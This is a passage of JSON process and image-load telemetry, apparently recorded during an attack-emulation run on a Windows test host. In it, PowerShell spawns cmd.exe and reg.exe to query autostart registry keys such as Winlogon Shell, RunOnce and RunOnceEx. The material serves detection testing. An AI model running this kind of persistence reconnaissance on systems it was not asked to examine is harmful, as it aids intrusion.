"cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1980, - "ppid": 4072, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571312810000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "process", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "process", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4248, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571312980000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5316, - "ppid": 4248, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571313060000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "process", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "process", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7264, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571313220000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1448, - "ppid": 7264, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571313340000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "process", - "pid": 1448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" - }, - { - "event_type": "process", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7860, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571313530000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313390000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4136, - "ppid": 7860, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571313640000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313550000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "process", - "pid": 4136, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" - }, - { - "event_type": "process", - "pid": 7860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3952, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571313799984, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313710000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 360, - "ppid": 3952, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571313880000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001021C05001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 